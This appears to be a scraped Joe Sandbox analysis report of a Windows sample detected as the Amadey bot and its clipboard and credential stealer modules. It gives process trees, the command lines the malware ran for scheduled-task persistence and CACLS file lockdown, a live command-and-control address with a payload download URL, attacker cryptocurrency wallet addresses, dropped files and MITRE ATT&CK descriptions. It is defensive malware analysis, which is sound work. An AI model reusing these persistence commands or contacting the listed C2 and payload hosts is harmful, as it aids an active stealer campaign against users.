Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
Imagebase:	0x980000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000C.00000002.775069911.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000002.774886747.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000C.00000002.775069911.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000C.00000002.775069911.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000000.318048617.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs
Reputation:	moderate

Analysis Process: schtasks.exePID: 1084, Parent PID: 1276

General

Target ID:	13
Start time:	20:00:46
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
Imagebase:	0x12e0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 5176, Parent PID: 1084

General

Target ID:	14
Start time:	20:00:46
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 2376, Parent PID: 1276

General

Target ID:	15
Start time:	20:00:46
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y\|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exePID: 408, Parent PID: 2376

General

Target ID:	16
Start time:	20:00:46
Start date:	07/02/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 4784, Parent PID: 2376

General

Target ID:	17
Start time:	20:00:50
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cacls.exePID: 3888, Parent PID: 2376

General

Target ID:	18
Start time:	20:00:50
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "mnolyk.exe" /P "user:N"
Imagebase:	0x1120000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: mnolyk.exePID: 4760, Parent PID: 1064

General

Target ID:	19
Start time:	20:00:50
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0x980000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000002.332316282.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000000.329538528.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Analysis Process: cacls.exePID: 4788, Parent PID: 2376

General

Target ID:	20
Start time:	20:00:50
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "mnolyk.exe" /P "user:R" /E
Imagebase:	0x1120000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exePID: 676, Parent PID: 2376

General

Target ID:	21
Start time:	20:00:51
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: rundll32.exePID: 788, Parent PID: 1276

General

Target ID:	22
Start time:	20:00:51
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Imagebase:	0x920000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cacls.exePID: 1328, Parent PID: 2376

General

Target ID:	23
Start time:	20:00:51
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\4b9a106e76" /P "user:N"
Imagebase:	0x1120000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cacls.exePID: 3712, Parent PID: 2376

General

Target ID:	24
Start time:	20:00:52
Start date:	07/02/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\4b9a106e76" /P "user:R" /E
Imagebase:	0x1120000
File size:	27648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: mnolyk.exePID: 5100, Parent PID: 1064

General

Target ID:	25
Start time:	20:01:01
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0x7ff603c50000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000002.352687909.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000019.00000000.352170413.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Analysis Process: mnolyk.exePID: 3888, Parent PID: 1064

General

Target ID:	28
Start time:	20:02:00
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0x980000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000000.478665181.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000002.479520127.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Analysis Process: mnolyk.exePID: 1100, Parent PID: 1064

General

Target ID:	30
Start time:	20:03:00
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0x980000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000002.607631806.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000000.607288773.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Analysis Process: mnolyk.exePID: 5124, Parent PID: 1064

General

Target ID:	31
Start time:	20:04:00
Start date:	07/02/2023
Path:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Imagebase:	0x980000
File size:	241664 bytes
MD5 hash:	8BB923C4D81284DAEF7896E5682DF6C6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000000.735906035.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000002.736447784.0000000000981000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security

Disassembly

⊘No disassembly

Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll	Avira URL Cloud: Label: malware
Source: http://62.204.41.4/Gol478Ns/index.php	Avira URL Cloud: Label: malware
Source: 62.204.41.4/Gol478Ns/index.php	Avira URL Cloud: Label: malware

Source: 62.204.41.4/Gol478Ns/index.php	Virustotal: Detection: 12%			Perma Link
Source: http://62.204.41.4/Gol478Ns/Plugins/clip64.dll	Virustotal: Detection: 16%			Perma Link

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	ReversingLabs: Detection: 53%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll	ReversingLabs: Detection: 80%

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Joe Sandbox ML: detected

Source: 19.0.mnolyk.exe.980000.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "62.204.41.4/Gol478Ns/index.php", "Version": "3.66"}
Source: 22.2.rundll32.exe.6d0c0000.0.unpack	Malware Configuration Extractor: Amadey {"Wallet Addresses": ["bc1qslzv7hczpsatc8lq285gy38r4af0c3alsc4m77", "0x89E34Ee2016a5E5a97b5E9598C251D2a2746Ba0D", "LdYspWr6nkQ3ZNNTsmba77u4frHDhji1Nv", "DBjzffi3umhLQbUGLRoNQwZ4pjoKyNFahf", "42zbZM5ozb4iDSN7hxNnQ1DSAvEmGY3z2KvAYmMxSJkUCc5bJyJ5hdkUu4324VJx8ACcDJJXg2NbRdWVcDyS87tyLikjVVJ"]}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00942F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Services
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Amadey

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\nika.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\afCf.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll

C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe

C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll

C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll

\Device\ConDrv

Windows Analysis Report
file.exe

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre